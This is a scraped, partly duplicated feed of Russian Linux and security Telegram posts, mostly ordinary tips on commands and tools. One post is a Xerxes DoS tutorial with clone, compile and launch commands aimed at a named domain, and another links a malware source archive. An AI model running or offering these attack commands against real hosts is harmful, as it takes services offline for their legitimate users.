Forwarded from Анализ данных (Data analysis)
☠ 9 способов защититься от утечки данныхныхНачнем с определения. Нарушение данных — это нарушение безопасности, при котором конфиденциальные, защищенные или конфиденциальные данные копируются, передаются, просматриваются, крадутся или используются лицом, не уполномоченным на это. Здесь все довольно понятно, а вот кто и как давайте разберем.
Существует много разных факторов утечки персональных данных. Основные из них:
от безалаберности сотрудников/разработчиков: открытые БД, открытые порты и т.п.;
слив данных самими сотрудниками;
дыры безопасности сайтов.
Давайте чуть более подробно расскажем про каждый пункт.
К нам приходил запрос от крупной сети АЗС, у которых злоумышленники воровали бонусные баллы клиентов. Для того чтобы понять в чем дело компания предоставила нам исходный код для анализа. Решение разрабатывала одна из топовых Российских IT команд, код был качественным, но без самой базовой проработки безопасности.
Читать дальше
@data_analysis_ml
👍9
DDoS-атаки с DNS-усилением: как это работает и как их остановить?
DDoS-атаки с DNS-усилением (или Амплификация DDoS-атаки с помощью DNS) — это один из популярных способов, используемый злоумышленниками для увеличения пропускную способности своих атак, которые они могут нацелить на потенциальные жертвы. Сам способ не является чем-то новым — первые упоминания о подобных атаках датируются еще серединой 2000-х годов. Но с тех пор мало что изменилось, кроме, пожалуй, количества и мощности таких атак (ведь если работает, зачем что-то менять?). И основная причина все та же: сотни тысяч неправильно сконфигурированных DNS-серверов во Всемирной Сети, принимающие и отвечающие на любой запрос от любого пользователя в Интернете.
Читать дальше
@linuxkalii
DDoS-атаки с DNS-усилением (или Амплификация DDoS-атаки с помощью DNS) — это один из популярных способов, используемый злоумышленниками для увеличения пропускную способности своих атак, которые они могут нацелить на потенциальные жертвы. Сам способ не является чем-то новым — первые упоминания о подобных атаках датируются еще серединой 2000-х годов. Но с тех пор мало что изменилось, кроме, пожалуй, количества и мощности таких атак (ведь если работает, зачем что-то менять?). И основная причина все та же: сотни тысяч неправильно сконфигурированных DNS-серверов во Всемирной Сети, принимающие и отвечающие на любой запрос от любого пользователя в Интернете.
Читать дальше
@linuxkalii
👍13
💀 XERXES – самый мощный инструмент для DoS-атаки с использованием Kali Linux
В этом посте мы покажем вам, как использовать Xerxes при запуске атаки DOS.
Инструменты DDOS способны загружать большие нагрузки на HTTP-серверы и вызывать их на колени, исчерпывая свои ресурсы.
Что такое DOS-атака?
Тип атаки, которая флудит серверы или сети, что приводит к тому, что источник недоступен для законных пользователей.
Недавно хакеры представили новый образец атаки DDOS под названием Pulse wave, который способен фиксировать несколько целей.
У Pulse Wave нет периода нарастания, как классическая DDoS-атака, все источники зафиксированы один раз и продолжаются по продолжительности.
Кроме того, бот Mirai, который используется в ориентации на колледж в США, длится более 54 часов непрерывно, и исследователи считают, что это новый вариант Mirai, который «более искусен при запуске нападений на уровне приложений».
Учебник Xerxes – Kali Linux
Этот инструмент был зафиксирован на Github от zanyarjamal, это один из простых и мощных инструментов DOS.
Чтобы клонировать инструмент из Github:
# git clone https://github.com/Soldie/xerxes-DDos-zanyarjamal-C
Затем перейдите к клонированной папке.
# cd xerxes
Далее вы должны скомпилировать компилятор GNU GCC
# gcc xerxes.c -o xerxes
Чтобы начать атаку
# ./xerxes tsarev.biz 80
❗️ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством.
@linuxkalii
В этом посте мы покажем вам, как использовать Xerxes при запуске атаки DOS.
Инструменты DDOS способны загружать большие нагрузки на HTTP-серверы и вызывать их на колени, исчерпывая свои ресурсы.
Что такое DOS-атака?
Тип атаки, которая флудит серверы или сети, что приводит к тому, что источник недоступен для законных пользователей.
Недавно хакеры представили новый образец атаки DDOS под названием Pulse wave, который способен фиксировать несколько целей.
У Pulse Wave нет периода нарастания, как классическая DDoS-атака, все источники зафиксированы один раз и продолжаются по продолжительности.
Кроме того, бот Mirai, который используется в ориентации на колледж в США, длится более 54 часов непрерывно, и исследователи считают, что это новый вариант Mirai, который «более искусен при запуске нападений на уровне приложений».
Учебник Xerxes – Kali Linux
Этот инструмент был зафиксирован на Github от zanyarjamal, это один из простых и мощных инструментов DOS.
Чтобы клонировать инструмент из Github:
# git clone https://github.com/Soldie/xerxes-DDos-zanyarjamal-C
Затем перейдите к клонированной папке.
# cd xerxes
Далее вы должны скомпилировать компилятор GNU GCC
# gcc xerxes.c -o xerxes
Чтобы начать атаку
# ./xerxes tsarev.biz 80
❗️ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством.
@linuxkalii
👍18
XDM (Xtreme Download Manager) — мощный менеджер загрузок с открытым исходным кодом.
- Загружает потоковое видео со скоростью загрузки в пять раз быстрее;
- XDM хорошо работает со всеми доступными браузерами;
- Можно приостановить и возобновить любую прерванную или мертвую загрузку;
- XDM имеет ограничитель скорости, интеллектуальный планировщик и варианты загрузки в очередь;
- Поддерживает различные прокси-серверы.
https://xtremedownloadmanager.com/
@linuxkalii
- Загружает потоковое видео со скоростью загрузки в пять раз быстрее;
- XDM хорошо работает со всеми доступными браузерами;
- Можно приостановить и возобновить любую прерванную или мертвую загрузку;
- XDM имеет ограничитель скорости, интеллектуальный планировщик и варианты загрузки в очередь;
- Поддерживает различные прокси-серверы.
sudo wget https://github.com/subhra74/xdm/releases/download/7.2.11/xdm-setup-7.2.11.tar.xztar -xvf xdm-setup-7.2.11.tar.xzsudo sh install.shhttps://xtremedownloadmanager.com/
@linuxkalii
👍13
Linux-Command-Library – Библиотека команд Linux в виде мобильного приложения
В настоящее время приложение имеет 4608 страниц руководства и множество общих советов по работе с терминалом, которые удобно разбиты на 21 базовую категорию
⤷ Github
@linuxkalii #Linux #Useful
В настоящее время приложение имеет 4608 страниц руководства и множество общих советов по работе с терминалом, которые удобно разбиты на 21 базовую категорию
⤷ Github
@linuxkalii #Linux #Useful
👍7🔥5😱1
Атака «Браузер в браузере»
В этой статье рассматривается метод фишинга, который имитирует окно браузера внутри браузера для подмены настоящего домена.
Читать дальше
@linuxkalii
В этой статье рассматривается метод фишинга, который имитирует окно браузера внутри браузера для подмены настоящего домена.
Читать дальше
@linuxkalii
👍11
Упрощение рабочих алгоритмов мониторинга производительности и сетевой безопасности
Для выявления и решения проблем производительности комплексных систем важно иметь полное представление о том, как работают все их компоненты.
Для этого большинство производителей NPMD решений (мониторинг сети и сервисов) предоставляют ключевые показатели эффективности (KPI), которые описывают работу каждого из элементов системы. Нет ничего плохого в наличии KPI самих по себе, но в процессе поиска проблемы нужно проанализировать и сопоставить великое множество различных KPI. И насколько это будет эффективно?
Примем во внимание:
Объем. Некоторые инструменты для мониторинга предоставляют сотни, тысячи KPI, позиционируя это, как свое преимущество - но переизбыток информации может сделать определение проблемы практически невозможным. Нам нужны не просто числа, нам нужен контекст! Знания только того, что конкретный ресурс загружен на ХХ%, недостаточно. Нужно понимать, как этот ресурс используется в нормальных условиях, чтобы можно было определить степень отклонения текущих значений от нормы.
Полнота информации. Объемы данных постоянно растут, и многим другим системам трудно поспевать за этим ростом. Не получится проанализировать или визуализировать данные, которые они не собирают.
Очевидно, нет никакого преимущества от наличия KPI с огромным количеством сырых данных в том виде, в котором они базово поступают к нам. Поэтому, для преобразования информации в краткую и понятную инструкцию, необходима автоматизированная интеллектуальная система, которая позволила бы получить конкретную информацию о проблеме, а не просто разрозненные данные, на анализ которых придется потратить массу времени.
На примере одного из лидеров в отрасли сетевого мониторинга VIAVI Solutions и их платформы Observer рассмотрим, как сочетание подробных данных с автоматическим анализом и оптимизированным рабочим алгоритмом позволит нам гораздо более эффективно выявлять и решать проблемы производительности сетевых сервисов.
Читать дальше
@linuxkalii
Для выявления и решения проблем производительности комплексных систем важно иметь полное представление о том, как работают все их компоненты.
Для этого большинство производителей NPMD решений (мониторинг сети и сервисов) предоставляют ключевые показатели эффективности (KPI), которые описывают работу каждого из элементов системы. Нет ничего плохого в наличии KPI самих по себе, но в процессе поиска проблемы нужно проанализировать и сопоставить великое множество различных KPI. И насколько это будет эффективно?
Примем во внимание:
Объем. Некоторые инструменты для мониторинга предоставляют сотни, тысячи KPI, позиционируя это, как свое преимущество - но переизбыток информации может сделать определение проблемы практически невозможным. Нам нужны не просто числа, нам нужен контекст! Знания только того, что конкретный ресурс загружен на ХХ%, недостаточно. Нужно понимать, как этот ресурс используется в нормальных условиях, чтобы можно было определить степень отклонения текущих значений от нормы.
Полнота информации. Объемы данных постоянно растут, и многим другим системам трудно поспевать за этим ростом. Не получится проанализировать или визуализировать данные, которые они не собирают.
Очевидно, нет никакого преимущества от наличия KPI с огромным количеством сырых данных в том виде, в котором они базово поступают к нам. Поэтому, для преобразования информации в краткую и понятную инструкцию, необходима автоматизированная интеллектуальная система, которая позволила бы получить конкретную информацию о проблеме, а не просто разрозненные данные, на анализ которых придется потратить массу времени.
На примере одного из лидеров в отрасли сетевого мониторинга VIAVI Solutions и их платформы Observer рассмотрим, как сочетание подробных данных с автоматическим анализом и оптимизированным рабочим алгоритмом позволит нам гораздо более эффективно выявлять и решать проблемы производительности сетевых сервисов.
Читать дальше
@linuxkalii
👍9
MalwareSourceCode – Коллекция исходного кода вредоносного ПО для различных платформ, написанных на множестве разных языков программирования.
! Этот проект предназначен только для образовательных или исследовательских целей
⤷ Ссылка на проект
! Этот проект предназначен только для образовательных или исследовательских целей
⤷ Ссылка на проект
@linuxkalii | #Archive #Malware👍6❤1🔥1
❌ Мошенническое программное обеспечение (crimeware): глубокое погружение в Emotet
Насколько может быть выгодна киберпреступность? Если бы это была страна, киберпреступность имела бы 13-е место по величине ВВП в мире, при этом крупные многонациональные направления деятельности приносили бы более 1 миллиарда долларов США в год.
Это дает киберпреступникам достаточную мотивацию для генерирования постоянного потока спама и фишинга, создание глобальных ботнетов, вымогателей и многих других видов мошеннических программ. Но не следует думать, что киберпреступники угрожают только бизнесу — под их прицелом оказались почти все домохозяйства в мире.
Как вы можете защитить себя? Начните как можно ближе к источнику угрозы. Несмотря на то, что мы видим много спам-сообщений, наша основная задача в борьбе с киберугрозами должна быть сосредоточена на загрузчиках и установщиках Crimeware, таких как Emotet, Andromeda и Pony — тройке наиболее известных семейств загрузчиков malware. Когда-то давно Upatre также присутствовал в этой категории, но он, в основном, доставляет фармацевтические спам-сообщения, а не более опасные угрозы, такие как Trickbot или дюжина других различных видов вымогателей.
Emotet, Andromeda и Pony – основной источник угроз
Собранная информация группой ASERT наглядно демонстрирует, что блокирование киберугроз в месте возникновения вектора инфекции предотвращает последующее распространение инфекции, как и ее дополнительную полезную нагрузку.
Во второй половине 2019 года Emotet продемонстрировал значительное увеличение не только количества уникальных экземпляров, циркулирующих в Интернете, но и числа пострадавших.
Злоумышленники вводят новшества и уклоняются от обнаружения с помощью постоянных изменений и обновлений Emotet malware — стратегии, которая, в итоге, и обеспечила им главный приз в виде большего числа жертв.
Читать дальше
@linuxkalii
Насколько может быть выгодна киберпреступность? Если бы это была страна, киберпреступность имела бы 13-е место по величине ВВП в мире, при этом крупные многонациональные направления деятельности приносили бы более 1 миллиарда долларов США в год.
Это дает киберпреступникам достаточную мотивацию для генерирования постоянного потока спама и фишинга, создание глобальных ботнетов, вымогателей и многих других видов мошеннических программ. Но не следует думать, что киберпреступники угрожают только бизнесу — под их прицелом оказались почти все домохозяйства в мире.
Как вы можете защитить себя? Начните как можно ближе к источнику угрозы. Несмотря на то, что мы видим много спам-сообщений, наша основная задача в борьбе с киберугрозами должна быть сосредоточена на загрузчиках и установщиках Crimeware, таких как Emotet, Andromeda и Pony — тройке наиболее известных семейств загрузчиков malware. Когда-то давно Upatre также присутствовал в этой категории, но он, в основном, доставляет фармацевтические спам-сообщения, а не более опасные угрозы, такие как Trickbot или дюжина других различных видов вымогателей.
Emotet, Andromeda и Pony – основной источник угроз
Собранная информация группой ASERT наглядно демонстрирует, что блокирование киберугроз в месте возникновения вектора инфекции предотвращает последующее распространение инфекции, как и ее дополнительную полезную нагрузку.
Во второй половине 2019 года Emotet продемонстрировал значительное увеличение не только количества уникальных экземпляров, циркулирующих в Интернете, но и числа пострадавших.
Злоумышленники вводят новшества и уклоняются от обнаружения с помощью постоянных изменений и обновлений Emotet malware — стратегии, которая, в итоге, и обеспечила им главный приз в виде большего числа жертв.
Читать дальше
@linuxkalii
👍5🔥2
🧩 КОМАНДА IFCONFIG - ПРИМЕРЫ ИСПОЛЬЗОВАНИЯ
Команда ifconfig очень долго использовалась для настройки сети в операционных системах семейства Linux. С помощью нее вы можете включать или выключать сетевые интерфейсы, настраивать их параметры, переключать режимы и многое другое. Потом была разработана утилита ip, которая содержит больше функций, и имеет совсем другой синтаксис.
Читать дальше
@linuxkalii
Команда ifconfig очень долго использовалась для настройки сети в операционных системах семейства Linux. С помощью нее вы можете включать или выключать сетевые интерфейсы, настраивать их параметры, переключать режимы и многое другое. Потом была разработана утилита ip, которая содержит больше функций, и имеет совсем другой синтаксис.
Читать дальше
@linuxkalii
👍9
🦾 Известные баги ядра Linux и борьба с ними
Поскольку с каждым днём в современном цифровом пространстве появляются все новые кибер-угрозы, важность безопасности IT-систем переоценить сложно. При этом уязвимыми являются не только онлайн-сети, но и операционные системы. И хотя Linux отличается более высоким уровнем безопасности в сравнении с другими ОС, на 100% от угроз не защищена и она.
В действительности наблюдается повышение количества атак на операционные системы Linux. Наиболее ценные мишени зачастую работают именно на этой ОС, что ставит её безопасность во главу угла. Например, организации, которые стремятся сохранять свои коммуникации совместимыми с HIPAA, должны убедиться, что каждый элемент используемого ими ПО, включая операционные системы (англ.) и даже программы для цифрового рабочего пространства (англ.), максимально защищён.
Безопасность ядра Linux – основного интерфейса ОС, который управляет всеми остальными процессами – очень важна для безопасности всей системы. Наиболее успешные атаки на ядро Linux (англ.) обычно связаны с неудачной конфигурацией, кривым администрированием и типичными багами в самой системе.
К счастью, существует немало полезных рекомендаций по безопасности, которые можно найти на разных сайтах и информационных ресурсах. В этой статье мы познакомимся с наиболее распространёнными багами ядра Linux и узнаем, как можно закрыть его уязвимости и защититься от потенциальных атак.
Читать дальше
@linuxkalii
Поскольку с каждым днём в современном цифровом пространстве появляются все новые кибер-угрозы, важность безопасности IT-систем переоценить сложно. При этом уязвимыми являются не только онлайн-сети, но и операционные системы. И хотя Linux отличается более высоким уровнем безопасности в сравнении с другими ОС, на 100% от угроз не защищена и она.
В действительности наблюдается повышение количества атак на операционные системы Linux. Наиболее ценные мишени зачастую работают именно на этой ОС, что ставит её безопасность во главу угла. Например, организации, которые стремятся сохранять свои коммуникации совместимыми с HIPAA, должны убедиться, что каждый элемент используемого ими ПО, включая операционные системы (англ.) и даже программы для цифрового рабочего пространства (англ.), максимально защищён.
Безопасность ядра Linux – основного интерфейса ОС, который управляет всеми остальными процессами – очень важна для безопасности всей системы. Наиболее успешные атаки на ядро Linux (англ.) обычно связаны с неудачной конфигурацией, кривым администрированием и типичными багами в самой системе.
К счастью, существует немало полезных рекомендаций по безопасности, которые можно найти на разных сайтах и информационных ресурсах. В этой статье мы познакомимся с наиболее распространёнными багами ядра Linux и узнаем, как можно закрыть его уязвимости и защититься от потенциальных атак.
Читать дальше
@linuxkalii
👍9🔥3
В чем разница между "buffers" и "cache" в выводе утилиты free в Linux?
Кешированная память включает в себя еще кое-какие вещи, которые буферная память не имеет. Например, данные с tmpfs. Вот наглядный пример что бы показать отличие между buffers и cache:
mkdir t
mount -t tmpfs none t
dd if=/dev/zero of=t/zero.file bs=10240 count=10240
sync; echo 3 > /proc/sys/vm/drop_caches; free -m
umount t
sync; echo 3 > /proc/sys/vm/drop_caches; free -m
После выполения этого кода, вы увидите что "cache" уменьшился на 100 мегабайт, потому что именно такой объем данных был записан в tmpfs (которая хранит все в оперативной памяти). При этом, конечно, сам компьютер должен иметь эти самые 100 мегабайт свободной памяти что бы наш эксперимент удался.
Перед каждой попыткой сбросить данные буферной памяти на диске вызывается вот эта процедура:
sync; echo 3 > /proc/sys/vm/drop_caches
Параллельно с очисткой буферной памяти, происходит очистка дискового кеша.
Вообщем, все немножко более сложно чем вы объяснили задавая свой вопрос.
Buffers - это страницы памяти, которые еще не записаны на диск.
Cache - это данные, которые уже были прочитаны с диске и сохранены в оперативной памяти копьютера.
@linuxkalii
Кешированная память включает в себя еще кое-какие вещи, которые буферная память не имеет. Например, данные с tmpfs. Вот наглядный пример что бы показать отличие между buffers и cache:
mkdir t
mount -t tmpfs none t
dd if=/dev/zero of=t/zero.file bs=10240 count=10240
sync; echo 3 > /proc/sys/vm/drop_caches; free -m
umount t
sync; echo 3 > /proc/sys/vm/drop_caches; free -m
После выполения этого кода, вы увидите что "cache" уменьшился на 100 мегабайт, потому что именно такой объем данных был записан в tmpfs (которая хранит все в оперативной памяти). При этом, конечно, сам компьютер должен иметь эти самые 100 мегабайт свободной памяти что бы наш эксперимент удался.
Перед каждой попыткой сбросить данные буферной памяти на диске вызывается вот эта процедура:
sync; echo 3 > /proc/sys/vm/drop_caches
Параллельно с очисткой буферной памяти, происходит очистка дискового кеша.
Вообщем, все немножко более сложно чем вы объяснили задавая свой вопрос.
Buffers - это страницы памяти, которые еще не записаны на диск.
Cache - это данные, которые уже были прочитаны с диске и сохранены в оперативной памяти копьютера.
@linuxkalii
👍10
IDNT – Простое терминальное приложение для удаления установленного программного обеспечения в GNU/Linux и macOS
Используйте IDNT с осторожностью, дабы не удалить важный пакет и не сделать вашу систему незагружаемой
⤷ Ссылка на проект
@linuxkalii | #Interesting #Terminal #Linux #MacOS
Используйте IDNT с осторожностью, дабы не удалить важный пакет и не сделать вашу систему незагружаемой
⤷ Ссылка на проект
@linuxkalii | #Interesting #Terminal #Linux #MacOS
👍10
КАК УСТАНОВИТЬ GPARTED В UBUNTU
Программа Gparted окажется полезной для работы с подключенными к ПК дисками и их разделами. Одно из ее важных достоинств – наличие удобного графического интерфейса. Она позволяет легко создавать таблицы разделов, размечать диски, изменять или удалять текущие разделы.
Читать дальше
@linuxkalii
Программа Gparted окажется полезной для работы с подключенными к ПК дисками и их разделами. Одно из ее важных достоинств – наличие удобного графического интерфейса. Она позволяет легко создавать таблицы разделов, размечать диски, изменять или удалять текущие разделы.
Читать дальше
@linuxkalii
👍8🔥1😁1
Пробелы в именах файлов
Именование файлов и каталогов, по существу, не регламентируется, за исключением того, что имена ограничены по длине и не должны содержать косой черты или нули. В частности, допускаются пробелы. К сожалению, система UNIX имеет давнюю традицию разделения аргументов командной строки на пробелы, поэтому устаревшее ПО имеет тенденцию давать сбой, когда в именах файлов появляются пробелы.
Пробелы в именах файлов были обнаружены прежде всего в файловых системах, совместно используемых с компьютерами Мас и персональными компьютерами, но теперь они внедрились в культуру UNIX и также встречаются в некоторых стандартных пакетах программного обеспечения. Выхода нет: административные сценарии должны быть готовы обрабатывать пробелы в именах файлов (не говоря уже об апострофах, звездочках и различных других угрожающих пунктуационных метках).
В оболочке и в сценариях можно указывать имена файлов с пробелами, чтобы держать их части вместе. Например, команда
считает файл
выводит на экран длинный список всех файлов в каталоге
Именование файлов и каталогов, по существу, не регламентируется, за исключением того, что имена ограничены по длине и не должны содержать косой черты или нули. В частности, допускаются пробелы. К сожалению, система UNIX имеет давнюю традицию разделения аргументов командной строки на пробелы, поэтому устаревшее ПО имеет тенденцию давать сбой, когда в именах файлов появляются пробелы.
Пробелы в именах файлов были обнаружены прежде всего в файловых системах, совместно используемых с компьютерами Мас и персональными компьютерами, но теперь они внедрились в культуру UNIX и также встречаются в некоторых стандартных пакетах программного обеспечения. Выхода нет: административные сценарии должны быть готовы обрабатывать пробелы в именах файлов (не говоря уже об апострофах, звездочках и различных других угрожающих пунктуационных метках).
В оболочке и в сценариях можно указывать имена файлов с пробелами, чтобы держать их части вместе. Например, команда
$ less "Му spacey file" считает файл
Му spacey file в качестве единственного аргумента команды less. Также можно избежать отдельных пробелов с помощью обратной косой черты: $ less Му\ spacey\ file
Функция завершения имени файла большинства оболочек (зачастую привязанная к клавише <Таb>) обычно автоматически добавляет обратную косую черту. Когда вы пишете сценарии, полезным оружием, о котором нужно знать, является опция -print0. В сочетании с параметром xargs -0 она делает комбинацию find /xargs корректной, независимо от пробелов, содержащихся\ в именах файлов. Например, команда $ find / home-type f -size + 1М -print0 1 xarqs -0 ls -1 выводит на экран длинный список всех файлов в каталоге
/home размером более одного мегабайта.👍8
Neofetch – это системный информационный инструмент командной строки, написанный на bash
Neofetch отображает информацию о вашей операционной системе, программном и аппаратном обеспечении в эстетичном и визуально приятном виде.
#GitHub | #Shell #Linux #Useful #Interesting
@linuxkalii
Neofetch отображает информацию о вашей операционной системе, программном и аппаратном обеспечении в эстетичном и визуально приятном виде.
#GitHub | #Shell #Linux #Useful #Interesting
@linuxkalii
👍12🔥7
CPU-X – программа, которая собирает информацию о процессоре, материнской плате и многом другом
В отличии от CPU-Z - это свободное программное обеспечение с открытым исходным кодом, разработанное для GNU / Linux и FreeBSD
Его можно использовать в графическом режиме с помощью GTK или в текстовом режиме с помощью NCurses.
Сайт https://x0rg.github.io/CPU-X/
#GitHub | #Linux #Useful #Interesting
@linuxkalii
В отличии от CPU-Z - это свободное программное обеспечение с открытым исходным кодом, разработанное для GNU / Linux и FreeBSD
Его можно использовать в графическом режиме с помощью GTK или в текстовом режиме с помощью NCurses.
Сайт https://x0rg.github.io/CPU-X/
#GitHub | #Linux #Useful #Interesting
@linuxkalii
👍15👎1😱1
vim учебник Начало работы с vim
Vim (или «Vi IMproved») представляет собой консольный многомодовый ( модальный ) текстовый редактор. Он широко используется и доступен по умолчанию для всех систем Unix, Linux и Apple OS X. Vim имеет большое активное сообщество и широкую пользовательскую базу. Редактор поддерживает все популярные языки программирования, и многие плагины доступны для расширения своих возможностей.
Разработчики любят редактор за скорость, множество опций конфигурации и мощное редактирование на основе выражений. В режиме «команды» редактор управляется командами клавиатуры, поэтому пользователь не отвлекается на графический интерфейс или указатель мыши.
Vim основан на более раннем редакторе Unix «vi», созданном в семидесятых годах, и с 1991 года он постоянно развивается. С помощью макросов и плагинов редактор предлагает большинство функций современной среды разработки. Он также уникально способен обрабатывать большие объемы текста со своим языком сценариев (vimscript) и регулярными выражениями.
Читать дальше
@linuxkalii
Vim (или «Vi IMproved») представляет собой консольный многомодовый ( модальный ) текстовый редактор. Он широко используется и доступен по умолчанию для всех систем Unix, Linux и Apple OS X. Vim имеет большое активное сообщество и широкую пользовательскую базу. Редактор поддерживает все популярные языки программирования, и многие плагины доступны для расширения своих возможностей.
Разработчики любят редактор за скорость, множество опций конфигурации и мощное редактирование на основе выражений. В режиме «команды» редактор управляется командами клавиатуры, поэтому пользователь не отвлекается на графический интерфейс или указатель мыши.
Vim основан на более раннем редакторе Unix «vi», созданном в семидесятых годах, и с 1991 года он постоянно развивается. С помощью макросов и плагинов редактор предлагает большинство функций современной среды разработки. Он также уникально способен обрабатывать большие объемы текста со своим языком сценариев (vimscript) и регулярными выражениями.
Читать дальше
@linuxkalii
👍16🔥4😁1